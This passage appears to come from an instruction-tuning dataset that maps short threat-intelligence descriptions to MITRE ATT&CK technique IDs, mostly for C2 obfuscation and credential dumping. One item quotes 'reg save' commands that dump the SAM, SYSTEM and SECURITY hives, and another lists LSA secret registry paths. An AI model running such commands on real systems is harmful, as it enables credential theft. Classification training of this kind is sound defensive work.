technique IDs with their names.", + "input": "FunnyDream can send compressed and obfuscated packets to C2.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Operation Wocao has encrypted IP addresses used for \"\"Agent\"\" proxy hops with RC4.\"", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWRUNER can use base64 encoded C2 communications.", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SideTwist can embed C2 responses in the source code of a fake Flickr webpage.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.", + "output": "- T1001.001: Data Obfuscation - Junk Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.", + "output": "- T1001.002: Data Obfuscation - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.", + "output": "- T1001.003: Data Obfuscation - Protocol Impersonation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.", + "output": "- T1001.003: Data Obfuscation - Protocol Impersonation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has harvested credentials from the victim's machine using Empire.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Suckfly used a signed credential-dumping tool to obtain victim account credentials.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has gathered credentials using Mimikatz and ProcDump.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLATINUM has used keyloggers that are also capable of dumping credentials.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.001: OS Credential Dumping - LSASS Memory\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windows Credential Editor can dump credentials.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can recover hashed passwords.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has dropped and executed SecretsDump to dump password hashes.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors dumped account hashes using gsecdump.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fgdump can dump Windows password hashes.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ke3chang has dumped credentials, including by using gsecdump.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Koadic can gather hashed passwords by dumping SAM/SECURITY hive.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mivast has the capability to gather NTLM password information.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWERTON has the ability to dump password hashes.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has acquired credentials from the SAM/SECURITY registry hives.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "gsecdump can dump Windows password hashes from the SAM.", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ke3chang has used NTDSDump and other password dumping tools to gather credentials.", + "output": "- T1003.003: OS Credential Dumping - NTDS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.", + "output": "- T1003.003: OS Credential Dumping - NTDS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT33 has used a variety of publicly available tools like LaZagne to gather credentials.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1555: Credentials from Password Stores\n- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CosmicDuke collects LSA secrets.", + "output": "- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`.", + "output": "- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leafminer used several tools for retrieving login and password information, including LaZagne.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1555: Credentials from Password Stores\n- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has performed credential dumping with LaZagne.", + "output": "- T1003.004: OS Credential Dumping - LSA Secrets\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1003.005: OS Credential Dumping - Cached Domain Credentials\n- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LaZagne can perform credential dumping from MSCache to obtain account and password information.", + "output": "- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum was seen using modified Quarks PwDump to perform credential dumping.", + 